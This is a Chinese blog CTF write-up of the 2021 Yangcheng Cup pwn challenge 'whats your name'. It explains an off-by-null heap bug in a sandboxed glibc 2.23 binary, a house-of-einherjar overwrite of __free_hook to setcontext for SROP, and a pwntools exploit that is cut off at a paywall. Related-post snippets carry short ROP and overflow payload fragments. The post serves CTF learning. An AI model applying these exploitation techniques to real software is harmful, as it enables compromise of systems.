2021羊城杯 pwn whats your name

最新推荐文章于 2024-09-06 16:15:01 发布
原创 最新推荐文章于 2024-09-06 16:15:01 发布 · 450 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文介绍如何利用Off-by-One漏洞攻击一个具备全保护机制和沙箱的C程序,通过具体步骤展示了如何使用house of ein技巧改写free_hook,最终实现堆栈上的返回导向编程。

在这里插入图片描述
libc是2.23的。

在这里插入图片描述
保护是全开的。

在这里插入图片描述沙箱是有的。

在这里插入图片描述

菜单。

set name
在这里插入图片描述80是size

84是标志flag

88申请了0x10的chunk。
前八个字节是puts函数
后八个字节是我们的地址。

edit name
在这里插入图片描述显然是能够输入name。

在这里插入图片描述
它用了一个202060来处理输入,但是在处理v5跟j的关系上面会有一个off by null。

puts name
在这里插入图片描述就是输出。

delete name
在这里插入图片描述
delete也删除干净了。

所以说白了就是一个2.23的off by null。
然后因为开了沙箱,所以我们就通过off by null,用house of ein攻击free_hook,改成setcontext+53,做一个堆的SROP

exp

#!usr/bin/env python
#-*- coding:utf8 -*-
from pwn import *

r = process("./name")
elf = ELF("./name")
libc = ELF("./libc.so.6")

def add(size):
    r.sendlineafter("5.exit\n", "1")
    r.sendlineafter("name size:", str(size))   

def dele(idx):
    r.sendlineafter("5.exit\n", "4"
最低0.47元/天 解锁文章
tuma五道入门pwn题解析
weixin_44113469的博客
03-12 932
0x01 pwn1 只有v5==-559869752 成立,就能输出flag,查看v5位置,直接覆盖。 exp from pwn import * context(os='linux', arch='i386', log_level='debug') p = process('./pwn1.dms') p.recvuntil('What... is your name?\n') p.sendl...
攻防世界XCTF-Pwn入门11题解题报告
ailx10
03-15 1893
Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。攻防世界XCFT刷题信息汇总如下:攻防世界XCTF黑客笔记刷题记录 ~第一题:level0解题报告:首先看看这个程序是啥呗,哦64位Linux可执行程序:IDA看看逻辑,输出一个hello world然后就...
通过一道题学习堆栈结合|2021羊城whatyourname
rencvn的划水
03-06 408
羊城比赛队友解出了题,赛后看到其他师傅打栈的思路很好奇,立马做了复现,下面是学习的总结。 例行检查程序 64位程序,保护机制全开,是一个沙箱的题,题目给了libc文件 是2.23的libc,放到ida里分析,可以看出是add()函数。 只允许申请9个堆块,在用户申请堆块前,会先申请一个0x20大小的堆块,存放用户申请堆块的内容指针。还限制了我们最大只能申请0x100的堆块,show()函数 这里是直接调用的,如果没有沙箱,我们就可以通过show函数构造system...
2021羊城 pwn BabyRop
yongbaoii的博客
09-24 319
显然没开啥保护 显然就是个溢出。 显然是个后门函数 显然作用是能把一个字节与异或一个1 显然有个字符/cin/sh 显然用函数2能把/cin/sh变成/bin/sh。 就一套rop带走就行。 exp from pwn import* r = remote("192.168.39.35", 11000) elf = ELF("./BabyRop") payload = 'a' * 44 + p32(0x80491fd) + p32(0x8049332) + p32(0x804c024) + p32(.
2021 羊城 pwn how2heap
yongbaoii的博客
09-24 264
PIE NX RELRO都没开,然后题目说是2.23的libc。 显然是菜单。 add 地址都在bss上面,然后申请到的chunk都是0x20的,前面十个字节实我们可以的输入,再八个字节是输入的大小。 get get函数就是一个输出。 但是我们可以看到在第二个if的时候,result是int类型,所以可以有整数溢出。 del 显然也是一样的问题。 但要注意的是free之后会覆盖上来再凑齐,中间不会留空挡。 而且其实我们注意到这个地方是0x2e,但是前面可以序号一直到0x2f,那么我如果先释放0x.
羊城2024 pwn4(kernel >= 5.6
2301_79327647的博客
08-29 765
军训期间写题目实在是难崩,感觉能出的pwn4结果实在是没时间去搞(也有可能是我太菜了),赛后还被负责本次出题的学长贺师傅教育了一下,多练多练。个人感觉题目还行,虽然版本高一些,但是漏洞也很致命,只是magic_gradget不太好找了,没办法,好用的gadget是基于汇编上的,很容易就被修复,回顾我学的house系列,例如等中rdx都是编译级别的利用方式,可以很容易被修复,或者编译器发生变化也可能不再能使用。高版本的glibc真的难啊。
羊城2023 pwn-arrary_index_bank
sagic的博客
07-19 486
存在整数溢出,不可以直接改地址,因为super_ai的返回地址一定比v1高所为不行。会等于0x38呢,因为7*8产生了进位所以4被64位舍弃。程序中含有system函数初步判定可能为ret2text。地址因为是十进制所以进行转换查看是否泄漏成功。地址已经泄漏完成开始payload的搭建。cmp操作进行完比较相同为0不相同为1。接收地址-super_ai的返回地址。考虑堆栈平衡 + 0x1315。发现RAX已经变成负数。泄漏地址为rbp下一位。如何进行整数溢出呢?
羊城比赛pwn复现
最新发布
yufeiyu66的博客
09-06 698
pwn 比赛复现
2023羊城--pwn-heap复现
fuiifiuiii的博客
09-26 437
​ 可以看到,配合new(0x62)或(0x68)以后,delete(这里仅仅是为了达成能够往下修改的效果),然后连续创建两个(0x58),可以覆盖0x60,然后刚好达到第二堆块的index_chunk区域,从而修改指针。另外:这里被free掉的堆块也不会被再次使用,能够正确覆写的原因就是这个堆管理的表(也就是用了第一个堆来存储用到的堆的数据域的地址)可能发现用它的过程:从strtok的调用中,si进入发现got表跳转的第一个函数是它,然后用libc找到相应的位置,进行更改。
2024年“羊城”粤港澳大湾区网络安全大赛 PWN部分
Geek极安云科-致力于网络安全事业
08-31 561
直接rop构造栈迁移,先leak libc 然后让system binsh。存在0x10大小的溢出。
羊城2021_Re_BabySmc
CHUNJIUJUN的博客
09-21 719
拿到题第一件事查壳、看信息 无壳,64位 IDA,进入主函数 跟进byte_140001085 发现一大推数据,应该是被加密了 IDA动态调试,先F5,然后一路F8,随意输入flag,执行到140001085地址 继续一直F8到出现此对话,Yes 这时程序代码已经自解密了,然后一直按着F8直到程序暂停 重新进行动调,F5,一路F8,随意输入flag后继续F8,F8进去,再F5回去 接着边鼠标向下划边一直按...
[WP]2021羊城-Web部分
Y4tacker的博客
09-14 2271
文章目录写在前面WebCross The SideCheckin_GoOnly 4 (非预期解法)Only 4 (预期解法)NO SQLEasyCurl 写在前面 这次拿了第一还是比较开心的,一晚上没睡觉… Web Cross The Side 版本信息Laravel v8.26.1 (PHP v7.4.15) 目录扫描 应该是开启了redis 联系版本号,尝试debug-rce 既然有file_get_contents与file_put_contents,尝试ftp passivemode 成功出
2022羊城pwn wp
N1rvana的博客
09-04 1001
2022羊城pwn
[羊城2021]web wp
l11III1111的博客
09-12 1262
[羊城2021]web wp 题目页面进去就是源码,传入两个参数一个用来包含,一个来触发反序列化。 <?php highlight_file('index.php'); error_reporting(0); $gwht= $_GET["gwht"]; $ycb= $_GET["ycb"]; if(preg_match("/flag/",$gwht)){ die('hack' ); } if(preg_match("/secret/",$gwht)){ die('hack' ); }
羊城 2021 web go
F1or_的博客
09-13 339
比赛做不动,靠着赛后复现来学习一下。师傅们tql 一上来就是一个简单的登录页面,题目附件给了源码,打开看看 传入的uname通过text转换为str,一开始我以为是text转换为str的这里可能存在漏洞,上网一搜也没有发现。golang弱比较特性还是比较少,这个方法后面也直接被我排除了,找了好久,哭了。。。 既然这个绕过admin不行,就直接想到修改cookie值来进行身份验证。 全局搜索一下,发现cookie生成代码 这里可以加入一下代码验证一下 但是cookie并没有被解密出来,返还上层发现
CTF-Pwn-[BJDCTF 2nd]secret
归子莫的博客
05-06 1643
CTF-Pwn-[BJDCTF 2nd]secret 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]secret 下载题目文件 secret 思路 老规矩使用file...
2021羊城pwn部分wp
eeeeeight的博客
09-12 6979
前言: 羊城的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
BUUCTF PWN题刷题记录 (未完待续)
qq_41071646的博客
08-01 2144
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不刷。。等有空了再刷 第一题 连上就有flag的pwn 直接 运行就有权限,。 第二题 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
BUU-pwn(四)
Blazing-Angel的博客
09-04 278
BUU-pwn(四)
2023 羊城 pwn
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值